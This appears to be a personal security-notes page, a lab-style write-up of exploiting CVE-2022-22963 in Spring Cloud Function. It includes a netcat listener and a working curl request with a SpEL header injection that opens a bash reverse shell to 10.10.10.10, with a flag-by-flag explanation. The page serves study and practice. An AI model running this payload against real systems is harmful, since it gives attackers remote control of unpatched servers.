📚
Notes
  • Welcome
    • Intro
    • My OSCP Exam Adventure
  • Security Blogs
    • Initial Access 101
      • Spring Cloud Function CVE-2022-22963
    • Bug Hunting
      • XSS
        • Blog site search field
  • Active Directory
    • Tools
    • Common built-in AD groups
    • Identifying Users
    • LLMNR/NBT-NS Poisoning
    • Password Spraying
      • Enumerating & Retrieving Password Policies
      • Making a Target User list
      • Internal Password Spraying - from Linux
      • Internal Password Spraying - from Windows
    • Credentialed Enumeration
      • Linux
      • Windows
      • Living Off the Land
    • Kerberoasting
      • Linux
      • Windows
    • ACL
      • Enumeration
      • Abusing ACLs
      • DCSync
    • Privileged Access
    • AS-REP Roasting
    • Attacking Trusts
      • Enumerating Trust Relationships
      • Child -> Parent Trusts
      • Cross-Forest Trust Abuse
  • Enumeration
    • SMB, RPC - 137,138,139,445,111
    • MYSQL - 3306
    • MSSQl - 1433
    • FTP - 21
    • RPC - 111
    • DNS - 53
    • NFS - 2049
    • SMTP - 25
    • IMAP, POP3 - 110,143,993,995
    • SNMP - 161
    • SVN - 3690
    • IRC - 8067
    • Oracle TNS - 1521
    • LDAP
    • Linux Remote Management Protocols
    • Windows Remote Management Protocols
    • Fuzzing
    • IPMI - 623(UDP)
  • Common Applications
    • Application Enumeration
    • CMS (Content Management System)
      • Wordpress
      • Joomla
      • Drupal
    • Servlet Containers/Software Development
      • Tomcat
      • Jenkins
    • Customer Service Mgmt & Configuration Management
      • Gitlab
  • Shells
    • Reverse Shells
    • Bind Shells
    • Spawning a TTY Shell
    • Web Shells
  • Privilege Escalation
    • Other Resources
    • Linux PrivEsc
    • Windows PrivEsc
      • Windows Users Privileges
      • Information Gatthering & Enumeration
      • Privilege Escalation Techniques
  • File Transfers
    • Quick Cheatsheet
    • Windows File Transfer
    • Linux File Transfer
  • Password Attacks
    • Linux Local Password Attacks
      • Credential Hunting in Linux
      • Passwd, Shadow & Opasswd
    • Windows Local Password Attacks
      • Attacking SAM
      • Attacking LSASS
      • Attacking Active Directory & NTDS.dit
      • Credential Hunting in Windows
    • Pass-the-Hash (PtH)
    • Cracking Files
    • Remote Password Attacks
  • SIde Notes
    • Pivoting, Tunneling, and Port Forwarding
    • File Encryption
  • Programming
    • Downloading Files
Powered by GitBook
On this page
  • Introduction
  • Exploitation
  1. Security Blogs
  2. Initial Access 101

Spring Cloud Function CVE-2022-22963

Introduction

I was practicing and learning when I encountered a new vulnerability. I discovered a vulnerability called 'Local File Inclusion' (LFI) in a web application. During my exploration, I found a file named pom.xml, which I was unaware of, So after some research i found out that it is an XML file that contains information about the project and configuration details used by Maven to build the project.

Looking through the content of file and searching on google about the spring framework boot exploit, after researching i found a poc on github for CVE-2022-22963.

CVE-2022-22963:

In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.

References:

https://0x1.gitlab.io/exploit/SpringBoot-RCE/

https://github.com/me2nuk/CVE-2022-22963

https://nvd.nist.gov/vuln/detail/CVE-2022-22963

Exploitation

Starting the listener.

nc -lvnp 443

Running the payload which will call back to my machine.

curl -X POST http://10.10.10.10:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(new String[]{"/bin/bash","-c","exec /bin/bash -i &>/dev/tcp/10.10.10.10/443 <&1"})' --data-raw 'data' -v

Explaination:

  • The -H flag is used to specify a header for the request. In this case, it's setting the spring.cloud.function.routing-expression header to a specific value.

  • The value of the header is a Spring Expression Language (SpEL) expression. It uses the T() notation to call a specific Java class and invoke a method. In this case, it's calling java.lang.Runtime.getRuntime().exec().

  • The exec() method is used to execute a command on the operating system. The command being executed is /bin/bash -c 'exec /bin/bash -i &>/dev/tcp/10.10.10.10/443 <&1'. This command is attempting to establish a reverse shell connection

  • The --data-raw flag specifies the raw data that will be included in the request body. In this case, it's set to 'data'.

  • The -v flag is used to enable verbose mode, which provides more detailed output during the request.

Got Shell

PreviousInitial Access 101NextBug Hunting

Last updated 1 year ago